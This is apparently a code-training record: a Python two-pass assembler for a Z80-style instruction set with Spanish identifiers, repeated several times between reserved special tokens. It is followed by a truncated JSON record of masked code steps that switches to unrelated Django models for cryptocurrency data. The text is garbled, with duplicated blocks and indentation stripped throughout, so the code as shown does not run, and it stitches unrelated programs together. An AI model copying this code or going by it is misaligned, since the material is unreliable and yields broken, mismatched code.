self.TS[label[0].strip()] = self.cl
del label[0]
self.instruction = label[0]
def get_operands(self):
line = self.instruction.split()
self.operands = [operand for operand in line]
self.instruction = self.operands[0]
del self.operands[0]
self.num_ope = len(self.operands)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Ensambler(object):
def __init__(self, fileName):
self.fileName = fileName
self.fileLines = []
self.cl = 0
self.size = 0
self.code = ''
self.instruction = ''
self.num_ope = 0
self.operands = []
self.TS = {}
self.CO = []
self.x = 0
def leerArchivo(self):
file = open(self.fileName, 'r')
for line in file:
line = line.replace('\n', '')
line = line.replace('\t', '')
self.fileLines.append(line)
file.close()
def first_pass(self):
for line in self.fileLines:
self.clean_line(line)
self.get_label()
self.get_operands()
if self.num_ope == 1:
if self.instruction in mne.v_jump:
if self.instruction == 'JP':
                        self.x = self.TS[self.operands[0]]
print('l')
print(self.x)
if self.operands[0] in mne.v_jump:
self.instruction = self.instruction + ' ' + self.operands[0
] + ',' + self.operands[1]
if self.operands[0][1:-1].isnumeric():
self.instruction = self.instruction + ' ' + self.operands[0
] + ',' + self.operands[1]
if self.num_ope == 1:
if self.instruction in mne.v_jump:
self.operands[0] = 'nn'
self.instruction = (self.instruction + ' ' + self.
operands[0])
code, size = mne.map_mnem.get(self.instruction, 'Error'
)('0000')
self.cl += size
else:
print(self.instruction)
print(self.CO)
print(self.cl)
print(self.TS)
def Second_pass(self):
for line in self.fileLines:
self.clean_line(line)
self.get_label()
self.get_operands()
if self.instruction in mne.v_jump:
if len(self.operands) == 2:
aux = self.operands[1]
else:
aux = self.operands[0]
if aux in self.TS.keys():
self.x = self.TS[aux]
self.instruction = self.instruction + ' ' + 'nn'
code, size = mne.map_mnem.get(self.instruction, 'Error')(
str(self.x))
self.CO.append(code)
else:
print('Error')
else:
if self.num_ope == 2:
self.instruction = self.instruction + ' ' + self.operands[0
] + ',' + self.operands[1]
if self.num_ope == 1:
self.instruction = self.instruction + ' ' + self.operands[0
]
code, size = mne.map_mnem.get(self.instruction, 'Error')()
self.CO.append(code)
print(self.CO)
def clean_line(self, line):
line = line.split(';')
self.instruction = line[0].upper().replace(',', '')
def get_label(self):
label = self.instruction.split(':')
if len(label) > 1:
if label[0] in mne.v_ops or label[0] in mne.map_mnem:
print('Error etiqueta invalida')
self.TS[label[0].strip()] = self.cl
del label[0]
self.instruction = label[0]
def get_operands(self):
line = self.instruction.split()
self.operands = [operand for operand in line]
self.instruction = self.operands[0]
del self.operands[0]
self.num_ope = len(self.operands)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Ensambler(object):
def __init__(self, fileName):
self.fileName = fileName
self.fileLines = []
self.cl = 0
self.size = 0
self.code = ''
self.instruction = ''
self.num_ope = 0
self.operands = []
self.TS = {}
self.CO = []
self.x = 0
def leerArchivo(self):
file = open(self.fileName, 'r')
for line in file:
line = line.replace('\n', '')
line = line.replace('\t', '')
self.fileLines.append(line)
file.close()
def first_pass(self):
for line in self.fileLines:
self.clean_line(line)
self.get_label()
self.get_operands()
if self.num_ope == 1:
if self.instruction in mne.v_jump:
if self.instruction == 'JP':
                        self.x = self.TS[self.operands[0]]
print('l')
print(self.x)
if self.operands[0] in mne.v_jump:
self.instruction = self.instruction + ' ' + self.operands[0
] + ',' + self.operands[1]
if self.operands[0][1:-1].isnumeric():
self.instruction = self.instruction + ' ' + self.operands[0
] + ',' + self.operands[1]
if self.num_ope == 1:
if self.instruction in mne.v_jump:
self.operands[0] = 'nn'
self.instruction = (self.instruction + ' ' + self.
operands[0])
code, size = mne.map_mnem.get(self.instruction, 'Error'
)('0000')
self.cl += size
else:
print(self.instruction)
print(self.CO)
print(self.cl)
print(self.TS)
def Second_pass(self):
for line in self.fileLines:
self.clean_line(line)
self.get_label()
self.get_operands()
if self.instruction in mne.v_jump:
if len(self.operands) == 2:
aux = self.operands[1]
else:
aux = self.operands[0]
if aux in self.TS.keys():
self.x = self.TS[aux]
self.instruction = self.instruction + ' ' + 'nn'
code, size = mne.map_mnem.get(self.instruction, 'Error')(
str(self.x))
self.CO.append(code)
else:
print('Error')
else:
if self.num_ope == 2:
self.instruction = self.instruction + ' ' + self.operands[0
] + ',' + self.operands[1]
if self.num_ope == 1:
self.instruction = self.instruction + ' ' + self.operands[0
]
code, size = mne.map_mnem.get(self.instruction, 'Error')()
self.CO.append(code)
print(self.CO)
def clean_line(self, line):
line = line.split(';')
self.instruction = line[0].upper().replace(',', '')
def get_label(self):
label = self.instruction.split(':')
if len(label) > 1:
if label[0] in mne.v_ops or label[0] in mne.map_mnem:
print('Error etiqueta invalida')
self.TS[label[0].strip()] = self.cl
del label[0]
self.instruction = label[0]
def get_operands(self):
line = self.instruction.split()
self.operands = [operand for operand in line]
self.instruction = self.operands[0]
del self.operands[0]
self.num_ope = len(self.operands)
<|reserved_special_token_0|>
aux.leerArchivo()
aux.first_pass()
aux.Second_pass()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Ensambler(object):
def __init__(self, fileName):
self.fileName = fileName
self.fileLines = []
self.cl = 0
self.size = 0
self.code = ''
self.instruction = ''
self.num_ope = 0
self.operands = []
self.TS = {}
self.CO = []
self.x = 0
def leerArchivo(self):
file = open(self.fileName, 'r')
for line in file:
line = line.replace('\n', '')
line = line.replace('\t', '')
self.fileLines.append(line)
file.close()
def first_pass(self):
for line in self.fileLines:
self.clean_line(line)
self.get_label()
self.get_operands()
if self.num_ope == 1:
if self.instruction in mne.v_jump:
if self.instruction == 'JP':
                        self.x = self.TS[self.operands[0]]
print('l')
print(self.x)
if self.operands[0] in mne.v_jump:
self.instruction = self.instruction + ' ' + self.operands[0
] + ',' + self.operands[1]
if self.operands[0][1:-1].isnumeric():
self.instruction = self.instruction + ' ' + self.operands[0
] + ',' + self.operands[1]
if self.num_ope == 1:
if self.instruction in mne.v_jump:
self.operands[0] = 'nn'
self.instruction = (self.instruction + ' ' + self.
operands[0])
code, size = mne.map_mnem.get(self.instruction, 'Error'
)('0000')
self.cl += size
else:
print(self.instruction)
print(self.CO)
print(self.cl)
print(self.TS)
def Second_pass(self):
for line in self.fileLines:
self.clean_line(line)
self.get_label()
self.get_operands()
if self.instruction in mne.v_jump:
if len(self.operands) == 2:
aux = self.operands[1]
else:
aux = self.operands[0]
if aux in self.TS.keys():
self.x = self.TS[aux]
self.instruction = self.instruction + ' ' + 'nn'
code, size = mne.map_mnem.get(self.instruction, 'Error')(
str(self.x))
self.CO.append(code)
else:
print('Error')
else:
if self.num_ope == 2:
self.instruction = self.instruction + ' ' + self.operands[0
] + ',' + self.operands[1]
if self.num_ope == 1:
self.instruction = self.instruction + ' ' + self.operands[0
]
code, size = mne.map_mnem.get(self.instruction, 'Error')()
self.CO.append(code)
print(self.CO)
def clean_line(self, line):
line = line.split(';')
self.instruction = line[0].upper().replace(',', '')
def get_label(self):
label = self.instruction.split(':')
if len(label) > 1:
if label[0] in mne.v_ops or label[0] in mne.map_mnem:
print('Error etiqueta invalida')
self.TS[label[0].strip()] = self.cl
del label[0]
self.instruction = label[0]
def get_operands(self):
line = self.instruction.split()
self.operands = [operand for operand in line]
self.instruction = self.operands[0]
del self.operands[0]
self.num_ope = len(self.operands)
aux = Ensambler('1.txt')
aux.leerArchivo()
aux.first_pass()
aux.Second_pass()
<|reserved_special_token_1|>
#from tkinter import Tk, Text, INSERT
import mnemonicos as mne
class Ensambler(object):
def __init__(self, fileName):
        # File name
        self.fileName = fileName
        # File lines
        self.fileLines = []
        # Location counter
        self.cl = 0
        # Size
        self.size = 0
        # Opcode
        self.code = ""
        # Instruction
        self.instruction = ""
        # Operand counter
        self.num_ope = 0
        # Operands
        self.operands = []
        # Symbol table
        self.TS = {}
        # Object code
        self.CO = []
        # Aux
        self.x = 0
#self.window = Tk()
#self.window.geometry('400x50')
def leerArchivo(self):
file = open(self.fileName, "r")
for line in file:
line = line.replace("\n", "")
line = line.replace("\t", "")
self.fileLines.append(line)
file.close()
    # First pass
def first_pass(self):
for line in self.fileLines:
self.clean_line(line)
self.get_label()
self.get_operands()
if self.num_ope == 1:
if self.instruction in mne.v_jump:
if self.instruction == "JP":
                        self.x = self.TS[self.operands[0]]
print("l")
print(self.x)
if self.operands[0] in mne.v_jump:
self.instruction = self.instruction + " " + self.operands[0]+","+self.operands[1]
if self.operands[0][1:-1].isnumeric():
self.instruction = self.instruction + " " + self.operands[0]+","+self.operands[1]
if self.num_ope == 1:
if self.instruction in mne.v_jump:
self.operands[0] = "nn"
self.instruction = self.instruction + " " + self.operands[0]
code, size = mne.map_mnem.get(self.instruction,"Error")("0000")
self.cl += size
else:
                # Checks whether it is not a valid opcode
print(self.instruction)
#code, size = mne.map_mnem.get(self.instruction,"Error")()
#lst = "CL: " + str(self.cl) + " Code: " + code
#self.CO.append(code)
print(self.CO)
print(self.cl)
print(self.TS)
def Second_pass(self):
for line in self.fileLines:
self.clean_line(line)
self.get_label()
self.get_operands()
if self.instruction in mne.v_jump:
if len(self.operands) == 2:
aux = self.operands[1]
else:
aux = self.operands[0]
if aux in self.TS.keys():
self.x = self.TS[aux]
self.instruction = self.instruction + " " + "nn"
code, size = mne.map_mnem.get(self.instruction,"Error")(str(self.x))
self.CO.append(code)
else:
print("Error")
else:
if self.num_ope == 2:
self.instruction = self.instruction + " " + self.operands[0]+","+self.operands[1]
if self.num_ope == 1:
self.instruction = self.instruction + " " + self.operands[0]
code, size = mne.map_mnem.get(self.instruction,"Error")()
self.CO.append(code)
print(self.CO)
    # Strip comments
def clean_line(self,line):
line = line.split(";")
self.instruction = line[0].upper().replace(",","")
    # Get and store the label if it exists
def get_label(self):
label = self.instruction.split(":")
if len(label) > 1:
if label[0] in mne.v_ops or label[0] in mne.map_mnem:
print("Error etiqueta invalida")
            # Strip leading whitespace
self.TS[label[0].strip()] = self.cl
del label[0]
self.instruction = label[0]
    # Get the operands and the instruction
def get_operands(self):
line = self.instruction.split()
self.operands = [operand for operand in line]
self.instruction = self.operands[0]
del self.operands[0]
self.num_ope = len(self.operands)
aux = Ensambler("1.txt")
aux.leerArchivo()
aux.first_pass()
aux.Second_pass()
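The two passes above lean on the `mnemonicos` module (`mne.v_jump`, `mne.map_mnem`), which is not included in the record. A self-contained miniature of the same two-pass idea, with a toy size table standing in for real Z80 encodings:

# Minimal two-pass sketch: one fake 1-byte opcode plus a 3-byte jump.
SIZES = {"NOP": 1, "JP": 3}
program = ["START: NOP", "JP END", "NOP", "END: NOP"]

symbols, cl = {}, 0                      # pass 1: only the location counter moves
for line in program:
    if ":" in line:
        label, line = [s.strip() for s in line.split(":", 1)]
        symbols[label] = cl
    cl += SIZES[line.split()[0]]

output = []                              # pass 2: labels are now resolvable
for line in program:
    line = line.split(":", 1)[-1].strip()
    parts = line.split()
    if parts[0] == "JP":
        output.append(("JP", symbols[parts[1]]))
    else:
        output.append((parts[0],))

print(symbols)  # {'START': 0, 'END': 5}
print(output)   # [('NOP',), ('JP', 5), ('NOP',), ('NOP',)]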
|
flexible
|
{
"blob_id": "3bc009271c7dd34ad09bcef81214387b63dfac59",
"index": 2549,
"step-1": "<mask token>\n\n\nclass Ensambler(object):\n\n def __init__(self, fileName):\n self.fileName = fileName\n self.fileLines = []\n self.cl = 0\n self.size = 0\n self.code = ''\n self.instruction = ''\n self.num_ope = 0\n self.operands = []\n self.TS = {}\n self.CO = []\n self.x = 0\n\n def leerArchivo(self):\n file = open(self.fileName, 'r')\n for line in file:\n line = line.replace('\\n', '')\n line = line.replace('\\t', '')\n self.fileLines.append(line)\n file.close()\n\n def first_pass(self):\n for line in self.fileLines:\n self.clean_line(line)\n self.get_label()\n self.get_operands()\n if self.num_ope == 1:\n if self.instruction in mne.v_jump:\n if self.instruction == 'JP':\n self.x = self.TS[operands[0]]\n print('l')\n print(self.x)\n if self.operands[0] in mne.v_jump:\n self.instruction = self.instruction + ' ' + self.operands[0\n ] + ',' + self.operands[1]\n if self.operands[0][1:-1].isnumeric():\n self.instruction = self.instruction + ' ' + self.operands[0\n ] + ',' + self.operands[1]\n if self.num_ope == 1:\n if self.instruction in mne.v_jump:\n self.operands[0] = 'nn'\n self.instruction = (self.instruction + ' ' + self.\n operands[0])\n code, size = mne.map_mnem.get(self.instruction, 'Error'\n )('0000')\n self.cl += size\n else:\n print(self.instruction)\n print(self.CO)\n print(self.cl)\n print(self.TS)\n\n def Second_pass(self):\n for line in self.fileLines:\n self.clean_line(line)\n self.get_label()\n self.get_operands()\n if self.instruction in mne.v_jump:\n if len(self.operands) == 2:\n aux = self.operands[1]\n else:\n aux = self.operands[0]\n if aux in self.TS.keys():\n self.x = self.TS[aux]\n self.instruction = self.instruction + ' ' + 'nn'\n code, size = mne.map_mnem.get(self.instruction, 'Error')(\n str(self.x))\n self.CO.append(code)\n else:\n print('Error')\n else:\n if self.num_ope == 2:\n self.instruction = self.instruction + ' ' + self.operands[0\n ] + ',' + self.operands[1]\n if self.num_ope == 1:\n self.instruction = self.instruction + ' ' + self.operands[0\n ]\n code, size = mne.map_mnem.get(self.instruction, 'Error')()\n self.CO.append(code)\n print(self.CO)\n <mask token>\n\n def get_label(self):\n label = self.instruction.split(':')\n if len(label) > 1:\n if label[0] in mne.v_ops or label[0] in mne.map_mnem:\n print('Error etiqueta invalida')\n self.TS[label[0].strip()] = self.cl\n del label[0]\n self.instruction = label[0]\n\n def get_operands(self):\n line = self.instruction.split()\n self.operands = [operand for operand in line]\n self.instruction = self.operands[0]\n del self.operands[0]\n self.num_ope = len(self.operands)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Ensambler(object):\n\n def __init__(self, fileName):\n self.fileName = fileName\n self.fileLines = []\n self.cl = 0\n self.size = 0\n self.code = ''\n self.instruction = ''\n self.num_ope = 0\n self.operands = []\n self.TS = {}\n self.CO = []\n self.x = 0\n\n def leerArchivo(self):\n file = open(self.fileName, 'r')\n for line in file:\n line = line.replace('\\n', '')\n line = line.replace('\\t', '')\n self.fileLines.append(line)\n file.close()\n\n def first_pass(self):\n for line in self.fileLines:\n self.clean_line(line)\n self.get_label()\n self.get_operands()\n if self.num_ope == 1:\n if self.instruction in mne.v_jump:\n if self.instruction == 'JP':\n self.x = self.TS[operands[0]]\n print('l')\n print(self.x)\n if self.operands[0] in mne.v_jump:\n self.instruction = self.instruction + ' ' + self.operands[0\n ] + ',' + self.operands[1]\n if self.operands[0][1:-1].isnumeric():\n self.instruction = self.instruction + ' ' + self.operands[0\n ] + ',' + self.operands[1]\n if self.num_ope == 1:\n if self.instruction in mne.v_jump:\n self.operands[0] = 'nn'\n self.instruction = (self.instruction + ' ' + self.\n operands[0])\n code, size = mne.map_mnem.get(self.instruction, 'Error'\n )('0000')\n self.cl += size\n else:\n print(self.instruction)\n print(self.CO)\n print(self.cl)\n print(self.TS)\n\n def Second_pass(self):\n for line in self.fileLines:\n self.clean_line(line)\n self.get_label()\n self.get_operands()\n if self.instruction in mne.v_jump:\n if len(self.operands) == 2:\n aux = self.operands[1]\n else:\n aux = self.operands[0]\n if aux in self.TS.keys():\n self.x = self.TS[aux]\n self.instruction = self.instruction + ' ' + 'nn'\n code, size = mne.map_mnem.get(self.instruction, 'Error')(\n str(self.x))\n self.CO.append(code)\n else:\n print('Error')\n else:\n if self.num_ope == 2:\n self.instruction = self.instruction + ' ' + self.operands[0\n ] + ',' + self.operands[1]\n if self.num_ope == 1:\n self.instruction = self.instruction + ' ' + self.operands[0\n ]\n code, size = mne.map_mnem.get(self.instruction, 'Error')()\n self.CO.append(code)\n print(self.CO)\n\n def clean_line(self, line):\n line = line.split(';')\n self.instruction = line[0].upper().replace(',', '')\n\n def get_label(self):\n label = self.instruction.split(':')\n if len(label) > 1:\n if label[0] in mne.v_ops or label[0] in mne.map_mnem:\n print('Error etiqueta invalida')\n self.TS[label[0].strip()] = self.cl\n del label[0]\n self.instruction = label[0]\n\n def get_operands(self):\n line = self.instruction.split()\n self.operands = [operand for operand in line]\n self.instruction = self.operands[0]\n del self.operands[0]\n self.num_ope = len(self.operands)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Ensambler(object):\n\n def __init__(self, fileName):\n self.fileName = fileName\n self.fileLines = []\n self.cl = 0\n self.size = 0\n self.code = ''\n self.instruction = ''\n self.num_ope = 0\n self.operands = []\n self.TS = {}\n self.CO = []\n self.x = 0\n\n def leerArchivo(self):\n file = open(self.fileName, 'r')\n for line in file:\n line = line.replace('\\n', '')\n line = line.replace('\\t', '')\n self.fileLines.append(line)\n file.close()\n\n def first_pass(self):\n for line in self.fileLines:\n self.clean_line(line)\n self.get_label()\n self.get_operands()\n if self.num_ope == 1:\n if self.instruction in mne.v_jump:\n if self.instruction == 'JP':\n self.x = self.TS[operands[0]]\n print('l')\n print(self.x)\n if self.operands[0] in mne.v_jump:\n self.instruction = self.instruction + ' ' + self.operands[0\n ] + ',' + self.operands[1]\n if self.operands[0][1:-1].isnumeric():\n self.instruction = self.instruction + ' ' + self.operands[0\n ] + ',' + self.operands[1]\n if self.num_ope == 1:\n if self.instruction in mne.v_jump:\n self.operands[0] = 'nn'\n self.instruction = (self.instruction + ' ' + self.\n operands[0])\n code, size = mne.map_mnem.get(self.instruction, 'Error'\n )('0000')\n self.cl += size\n else:\n print(self.instruction)\n print(self.CO)\n print(self.cl)\n print(self.TS)\n\n def Second_pass(self):\n for line in self.fileLines:\n self.clean_line(line)\n self.get_label()\n self.get_operands()\n if self.instruction in mne.v_jump:\n if len(self.operands) == 2:\n aux = self.operands[1]\n else:\n aux = self.operands[0]\n if aux in self.TS.keys():\n self.x = self.TS[aux]\n self.instruction = self.instruction + ' ' + 'nn'\n code, size = mne.map_mnem.get(self.instruction, 'Error')(\n str(self.x))\n self.CO.append(code)\n else:\n print('Error')\n else:\n if self.num_ope == 2:\n self.instruction = self.instruction + ' ' + self.operands[0\n ] + ',' + self.operands[1]\n if self.num_ope == 1:\n self.instruction = self.instruction + ' ' + self.operands[0\n ]\n code, size = mne.map_mnem.get(self.instruction, 'Error')()\n self.CO.append(code)\n print(self.CO)\n\n def clean_line(self, line):\n line = line.split(';')\n self.instruction = line[0].upper().replace(',', '')\n\n def get_label(self):\n label = self.instruction.split(':')\n if len(label) > 1:\n if label[0] in mne.v_ops or label[0] in mne.map_mnem:\n print('Error etiqueta invalida')\n self.TS[label[0].strip()] = self.cl\n del label[0]\n self.instruction = label[0]\n\n def get_operands(self):\n line = self.instruction.split()\n self.operands = [operand for operand in line]\n self.instruction = self.operands[0]\n del self.operands[0]\n self.num_ope = len(self.operands)\n\n\n<mask token>\naux.leerArchivo()\naux.first_pass()\naux.Second_pass()\n",
"step-4": "<mask token>\n\n\nclass Ensambler(object):\n\n def __init__(self, fileName):\n self.fileName = fileName\n self.fileLines = []\n self.cl = 0\n self.size = 0\n self.code = ''\n self.instruction = ''\n self.num_ope = 0\n self.operands = []\n self.TS = {}\n self.CO = []\n self.x = 0\n\n def leerArchivo(self):\n file = open(self.fileName, 'r')\n for line in file:\n line = line.replace('\\n', '')\n line = line.replace('\\t', '')\n self.fileLines.append(line)\n file.close()\n\n def first_pass(self):\n for line in self.fileLines:\n self.clean_line(line)\n self.get_label()\n self.get_operands()\n if self.num_ope == 1:\n if self.instruction in mne.v_jump:\n if self.instruction == 'JP':\n self.x = self.TS[operands[0]]\n print('l')\n print(self.x)\n if self.operands[0] in mne.v_jump:\n self.instruction = self.instruction + ' ' + self.operands[0\n ] + ',' + self.operands[1]\n if self.operands[0][1:-1].isnumeric():\n self.instruction = self.instruction + ' ' + self.operands[0\n ] + ',' + self.operands[1]\n if self.num_ope == 1:\n if self.instruction in mne.v_jump:\n self.operands[0] = 'nn'\n self.instruction = (self.instruction + ' ' + self.\n operands[0])\n code, size = mne.map_mnem.get(self.instruction, 'Error'\n )('0000')\n self.cl += size\n else:\n print(self.instruction)\n print(self.CO)\n print(self.cl)\n print(self.TS)\n\n def Second_pass(self):\n for line in self.fileLines:\n self.clean_line(line)\n self.get_label()\n self.get_operands()\n if self.instruction in mne.v_jump:\n if len(self.operands) == 2:\n aux = self.operands[1]\n else:\n aux = self.operands[0]\n if aux in self.TS.keys():\n self.x = self.TS[aux]\n self.instruction = self.instruction + ' ' + 'nn'\n code, size = mne.map_mnem.get(self.instruction, 'Error')(\n str(self.x))\n self.CO.append(code)\n else:\n print('Error')\n else:\n if self.num_ope == 2:\n self.instruction = self.instruction + ' ' + self.operands[0\n ] + ',' + self.operands[1]\n if self.num_ope == 1:\n self.instruction = self.instruction + ' ' + self.operands[0\n ]\n code, size = mne.map_mnem.get(self.instruction, 'Error')()\n self.CO.append(code)\n print(self.CO)\n\n def clean_line(self, line):\n line = line.split(';')\n self.instruction = line[0].upper().replace(',', '')\n\n def get_label(self):\n label = self.instruction.split(':')\n if len(label) > 1:\n if label[0] in mne.v_ops or label[0] in mne.map_mnem:\n print('Error etiqueta invalida')\n self.TS[label[0].strip()] = self.cl\n del label[0]\n self.instruction = label[0]\n\n def get_operands(self):\n line = self.instruction.split()\n self.operands = [operand for operand in line]\n self.instruction = self.operands[0]\n del self.operands[0]\n self.num_ope = len(self.operands)\n\n\naux = Ensambler('1.txt')\naux.leerArchivo()\naux.first_pass()\naux.Second_pass()\n",
"step-5": "\n#from tkinter import Tk, Text, INSERT\nimport mnemonicos as mne\n\n\nclass Ensambler(object):\n\n\n\tdef __init__(self, fileName):\n\t\n\t\t#Nombre del archivo\n\t\tself.fileName = fileName\n\t\t#Lineas del Archivo\n\t\tself.fileLines = []\n\t\t#Contador de Localidades\n\t\tself.cl = 0\n\t\t#Tamaño\n\t\tself.size = 0\n\t\t#Opcode\n\t\tself.code = \"\"\n\t\t#Intruccion\n\t\tself.instruction = \"\"\n\t\t#Contador de operadores\n\t\tself.num_ope = 0\n\t\t#Operandos\n\t\tself.operands = []\n\t\t# Tabla de simbolos\n\t\tself.TS = {}\n\t\t# Codigo Objeto\n\t\tself.CO = []\n\t\t#Aux\n\t\tself.x = 0\n\n\t\t#self.window = Tk()\n\t\t#self.window.geometry('400x50')\n\n\tdef leerArchivo(self):\n\t\tfile = open(self.fileName, \"r\")\n\t\tfor line in file:\n\t\t\tline = line.replace(\"\\n\", \"\")\n\t\t\tline = line.replace(\"\\t\", \"\")\n\t\t\tself.fileLines.append(line)\n\t\tfile.close()\n\n\t#Primera Pasada\n\tdef first_pass(self):\n\t\tfor line in self.fileLines:\n\t\t\tself.clean_line(line)\n\t\t\tself.get_label()\n\t\t\tself.get_operands()\n\t\t\tif self.num_ope == 1:\n\t\t\t\tif self.instruction in mne.v_jump:\n\t\t\t\t\tif self.instruction == \"JP\":\n\t\t\t\t\t\tself.x = self.TS[operands[0]]\n\t\t\t\t\t\tprint(\"l\")\n\t\t\t\t\t\tprint(self.x)\n\n\n\t\t\t\tif self.operands[0] in mne.v_jump:\n\t\t\t\t\tself.instruction = self.instruction + \" \" + self.operands[0]+\",\"+self.operands[1]\n\n\t\t\t\tif self.operands[0][1:-1].isnumeric():\n\t\t\t\t\tself.instruction = self.instruction + \" \" + self.operands[0]+\",\"+self.operands[1]\n\n\n\t\t\t\tif self.num_ope == 1:\n\t\t\t\t\tif self.instruction in mne.v_jump:\n\t\t\t\t\t\tself.operands[0] = \"nn\"\n\t\t\t\t\t\tself.instruction = self.instruction + \" \" + self.operands[0]\n\t\t\t\t\t\tcode, size = mne.map_mnem.get(self.instruction,\"Error\")(\"0000\")\n\t\t\t\t\t\tself.cl += size \n\t\t\telse:\n\t\t\t\t\n\t\t\t#Valida si no es opcode valido\n\t\t\t\tprint(self.instruction)\n\t\t\t#code, size = mne.map_mnem.get(self.instruction,\"Error\")()\n\t\t\t\n\t\t\t#lst = \"CL: \" + str(self.cl) + \" Code: \" + code\n\t\t\t#self.CO.append(code)\n\t\tprint(self.CO)\n\t\tprint(self.cl)\n\t\tprint(self.TS)\n\n\n\tdef Second_pass(self):\n\t\tfor line in self.fileLines:\n\t\t\tself.clean_line(line)\n\t\t\tself.get_label()\n\t\t\tself.get_operands()\n\t\t\t\n\t\t\tif self.instruction in mne.v_jump:\n\n\t\t\t\tif len(self.operands) == 2:\n\t\t\t\t\taux = self.operands[1]\n\t\t\t\telse:\n\t\t\t\t\taux = self.operands[0]\n\n\t\t\t\tif aux in self.TS.keys():\n\t\t\t\t\tself.x = self.TS[aux]\n\t\t\t\t\tself.instruction = self.instruction + \" \" + \"nn\"\n\t\t\t\t\tcode, size = mne.map_mnem.get(self.instruction,\"Error\")(str(self.x))\n\t\t\t\t\tself.CO.append(code)\n\n\t\t\t\telse:\n\t\t\t\t\tprint(\"Error\")\n\t\t\telse:\n\t\t\t\tif self.num_ope == 2:\n\t\t\t\t\tself.instruction = self.instruction + \" \" + self.operands[0]+\",\"+self.operands[1]\n\t\t\t\tif self.num_ope == 1:\n\t\t\t\t\tself.instruction = self.instruction + \" \" + self.operands[0]\n\t\t\t\tcode, size = mne.map_mnem.get(self.instruction,\"Error\")()\n\t\t\t\tself.CO.append(code)\n\t\tprint(self.CO)\n\n\n\t#Quitar Comentarios\n\tdef clean_line(self,line):\n\t\tline = line.split(\";\")\n\t\tself.instruction = line[0].upper().replace(\",\",\"\")\n\n\t# Obtener y guardar etiqueta si existe\n\tdef get_label(self):\n\n\t\tlabel = self.instruction.split(\":\")\n\n\t\tif len(label) > 1:\n\n\t\t\tif label[0] in mne.v_ops or label[0] in mne.map_mnem:\n\t\t\t\tprint(\"Error etiqueta 
invalida\")\n\t\t\t#Quitar espacio al inicio\n\t\t\tself.TS[label[0].strip()] = self.cl\n\n\t\t\tdel label[0]\n\n\n\t\tself.instruction = label[0]\n\n\t#Obtener los operandos y la instruccion\n\tdef get_operands(self):\n\t\tline = self.instruction.split()\n\t\tself.operands = [operand for operand in line]\n\t\tself.instruction = self.operands[0]\n\t\tdel self.operands[0]\n\t\tself.num_ope = len(self.operands)\n\n\t\t\n\t\naux = Ensambler(\"1.txt\")\naux.leerArchivo()\naux.first_pass()\naux.Second_pass()\n\n",
"step-ids": [
7,
8,
9,
10,
12
]
}
|
[
7,
8,
9,
10,
12
] |
from django.db import models


class crontab(models.Model):
    name = models.CharField(max_length=20)


class converter(models.Model):
    name = models.CharField(max_length=20)


class MainTable(models.Model):
    rank = models.IntegerField(null=True)
    coinid = models.CharField(max_length=30, null=True)
    symbol = models.CharField(max_length=10)
    name = models.CharField(max_length=30)
    thumbimg = models.CharField(max_length=30)
    marketcap = models.FloatField(null=True)
    totalvolume = models.FloatField(null=True)
    price_change = models.FloatField(null=True)
    pricechangepercentage = models.FloatField(null=True)
    onehourchange = models.FloatField(null=True)
    sevendaychange = models.FloatField(null=True)
    circulating_supply = models.FloatField(null=True)


class Table(models.Model):
    name = models.CharField(max_length=30)
    coinid = models.CharField(max_length=30)
    symbol = models.CharField(max_length=20)
    img = models.CharField(max_length=50)
    image = models.CharField(max_length=50)


class Price(models.Model):
    price = models.FloatField(null=True)


class Marketdata(models.Model):
    price_change_24h = models.FloatField(null=True)
    price_change_percentage_24h = models.FloatField(null=True)
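
# Illustrative usage sketch (an assumption, not part of the original app):
# pulling the top-ranked coins from MainTable in a Django shell or view.
#
# top_coins = MainTable.objects.filter(rank__isnull=False).order_by("rank")[:10]
# for coin in top_coins:
#     print(coin.rank, coin.symbol, coin.marketcap)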
|
normal
|
{
"blob_id": "0054921928838d9aee63cf58f50a0a01ee12635d",
"index": 6049,
"step-1": "<mask token>\n\n\nclass Table(models.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\nclass Price(models.Model):\n price = models.FloatField(null=True)\n\n\nclass Marketdata(models.Model):\n price_change_24h = models.FloatField(null=True)\n price_change_percentage_24h = models.FloatField(null=True)\n",
"step-2": "<mask token>\n\n\nclass Table(models.Model):\n name = models.CharField(max_length=30)\n coinid = models.CharField(max_length=30)\n symbol = models.CharField(max_length=20)\n img = models.CharField(max_length=50)\n image = models.CharField(max_length=50)\n\n\nclass Price(models.Model):\n price = models.FloatField(null=True)\n\n\nclass Marketdata(models.Model):\n price_change_24h = models.FloatField(null=True)\n price_change_percentage_24h = models.FloatField(null=True)\n",
"step-3": "<mask token>\n\n\nclass converter(models.Model):\n name = models.CharField(max_length=20)\n\n\nclass MainTable(models.Model):\n rank = models.IntegerField(null=True)\n coinid = models.CharField(max_length=30, null=True)\n symbol = models.CharField(max_length=10)\n name = models.CharField(max_length=30)\n thumbimg = models.CharField(max_length=30)\n marketcap = models.FloatField(null=True)\n totalvolume = models.FloatField(null=True)\n price_change = models.FloatField(null=True)\n pricechangepercentage = models.FloatField(null=True)\n onehourchange = models.FloatField(null=True)\n sevendaychange = models.FloatField(null=True)\n circulating_supply = models.FloatField(null=True)\n\n\nclass Table(models.Model):\n name = models.CharField(max_length=30)\n coinid = models.CharField(max_length=30)\n symbol = models.CharField(max_length=20)\n img = models.CharField(max_length=50)\n image = models.CharField(max_length=50)\n\n\nclass Price(models.Model):\n price = models.FloatField(null=True)\n\n\nclass Marketdata(models.Model):\n price_change_24h = models.FloatField(null=True)\n price_change_percentage_24h = models.FloatField(null=True)\n",
